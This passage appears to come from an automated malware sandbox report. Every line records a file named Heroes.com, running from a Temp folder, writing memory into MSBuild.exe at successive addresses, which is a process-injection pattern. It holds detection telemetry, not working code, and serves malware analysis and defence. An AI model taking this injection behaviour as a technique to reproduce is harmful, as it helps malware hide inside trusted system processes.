                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340C80Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340CE4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340D48Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340DACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340E10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340E74Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340ED8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340F3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1340FA0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341004Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341068Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13410CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341130Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341194Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13411F8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134125CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13412C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341324Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341388Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13413ECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341450Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13414B4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341518Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134157CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13415E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341644Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13416A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134170CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341770Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13417D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341838Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134189CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341900Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341964Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13419C8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341A2CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341A90Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341AF4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341B58Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341BBCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341C20Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341C84Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341CE8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341D4CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341DB0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341E14Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341E78Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341EDCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341F40Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1341FA4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134206CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13420D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342134Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342198Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13421FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342260Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13422C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342328Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134238CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13423F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342454Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13424B8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134251CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342580Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13425E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342648Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13426ACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342710Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342774Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13427D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134283CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13428A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342904Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342968Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13429CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342A30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342A94Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342AF8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342B5CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342BC0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342C24Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342C88Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342CECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342D50Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342DB4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342E18Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342E7CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342EE0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342F44Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1342FA8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134300CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343070Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13430D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343138Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134319CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343200Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343264Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13432C8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134332CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343390Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13433F4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343458Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13434BCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343520Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343584Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13435E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134364CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13436B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343714Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343778Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13437DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343840Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13438A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343908Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134396CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13439D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343A34Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343A98Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343AFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343B60Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343BC4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343C28Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343C8CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343CF0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343D54Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343DB8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343E1CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343E80Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343EE4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343F48Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343FACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344010Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344074Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13440D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134413CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13441A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344204Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344268Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13442CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344330Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344394Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13443F8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134445CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13444C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344524Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344588Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13445ECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344650Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13446B4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344718Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134477CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13447E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344844Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13448A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134490CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344970Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13449D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344A38Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344A9CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344B00Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344B64Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344BC8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344C2CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344C90Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344CF4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344D58Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344DBCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344E20Jump to behavior
